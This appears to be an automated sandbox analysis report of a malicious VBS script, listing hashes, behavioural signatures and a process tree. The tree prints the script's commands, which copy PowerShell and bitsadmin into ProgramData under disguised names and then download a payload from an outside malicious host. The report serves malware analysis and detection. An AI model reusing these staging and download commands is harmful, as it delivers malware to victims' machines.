Analysis
-
max time kernel
143s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20220310-en -
submitted
28-03-2022 01:21
Static task
static1
Behavioral task
behavioral1
Sample
c069b74525aa61709da74c75a8687ad61c8556e4c8bcd0c0a8010c25a9fe6e52.vbs
Resource
win7-20220331-en
General
-
Target
c069b74525aa61709da74c75a8687ad61c8556e4c8bcd0c0a8010c25a9fe6e52.vbs
-
Size
6KB
-
MD5
11f6b0f1a90680ea7f7d57b68ff305ee
-
SHA1
b1793a0401e017b90f8dea32bdf4d27c1af82fae
-
SHA256
c069b74525aa61709da74c75a8687ad61c8556e4c8bcd0c0a8010c25a9fe6e52
-
SHA512
69f219dc9b61146447850a802c31bbaf10f2b8624418dcf12bfdfcf6bf116c5d68c1d2fea79f3f4afa533b9f0134c7d911863a3d61816aecab58a1b4e1950e7a
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
KFJYTohin.exepid process 1044 KFJYTohin.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
WScript.execmd.exedescription pid process target process PID 3484 wrote to memory of 1392 3484 WScript.exe cmd.exe PID 3484 wrote to memory of 1392 3484 WScript.exe cmd.exe PID 1392 wrote to memory of 4008 1392 cmd.exe cmd.exe PID 1392 wrote to memory of 4008 1392 cmd.exe cmd.exe PID 1392 wrote to memory of 624 1392 cmd.exe cmd.exe PID 1392 wrote to memory of 624 1392 cmd.exe cmd.exe PID 3484 wrote to memory of 1044 3484 WScript.exe KFJYTohin.exe PID 3484 wrote to memory of 1044 3484 WScript.exe KFJYTohin.exe PID 3484 wrote to memory of 1044 3484 WScript.exe KFJYTohin.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c069b74525aa61709da74c75a8687ad61c8556e4c8bcd0c0a8010c25a9fe6e52.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\zoZjp.exe & cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\KFJYToh*.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\Windows\system32\cmd.execmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\zoZjp.exe3⤵PID:4008
-
-
C:\Windows\system32\cmd.execmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\KFJYToh*.exe3⤵PID:624
-
-
-
C:\ProgramData\KFJYTohin.exe"C:\ProgramData\KFJYTohin.exe" /transfer NEcBQb /download https://fhivelifestyle.online/lidepato/BRGDRD68M16L682M/uk.css C:\Users\Admin\AppData\Roaming\uk.css2⤵
- Executes dropped EXE
PID:1044
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
182KB
MD5f57a03fa0e654b393bb078d1c60695f3
SHA11ced6636bd2462c0f1b64775e1981d22ae57af0b
SHA256c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c
SHA5127e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a
-
Filesize
182KB
MD5f57a03fa0e654b393bb078d1c60695f3
SHA11ced6636bd2462c0f1b64775e1981d22ae57af0b
SHA256c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c
SHA5127e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a